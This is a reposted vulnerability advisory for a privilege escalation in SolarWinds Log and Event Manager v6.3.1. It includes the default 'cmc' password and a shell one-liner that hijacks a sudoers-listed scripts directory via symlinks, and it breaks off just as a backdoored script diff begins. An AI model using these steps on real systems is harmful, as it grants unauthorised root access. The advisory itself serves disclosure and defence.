[FD] KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path

KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path Title: Solarwinds LEM Privilege Escalation via Controlled Sudo Path Advisory ID: KL-001-2017-005 Publication Date: 2017.04.24 Publication URL: http://ift.tt/2pbcl6B 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-281: Improper Preservation of Permissions, CWE-708: Incorrect Ownership Assignment Impact: Privileged Access Attack vector: SSH 2. Vulnerability Description Due to lax filesystem permissions, an attacker can take control of a hardcoded sudo path in order to execute commands as a privileged user. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". Due to underlying filesystem permissions, it is possible for the cmc user to assume control of a path hardcoded in the sudoers file. The attack is started by moving the scripts directory and creating a symlink to a (now) attacker controlled scripts directory. cmc@swi-lem:/usr/local/contego$ mv scripts scripts.real && mkdir scripts && cd scripts.real && for A in * ; do ln -s ../scripts.real/${A} ../scripts/${A} ; done Next, a file specified in the sudoers file is overwritten and then executed using sudo. cmc@swi-lem:/usr/local/contego/scripts$ diff -u hostname.sh hostname.sh.backdoor

Source: Gmail -> IFTTT-> Blogger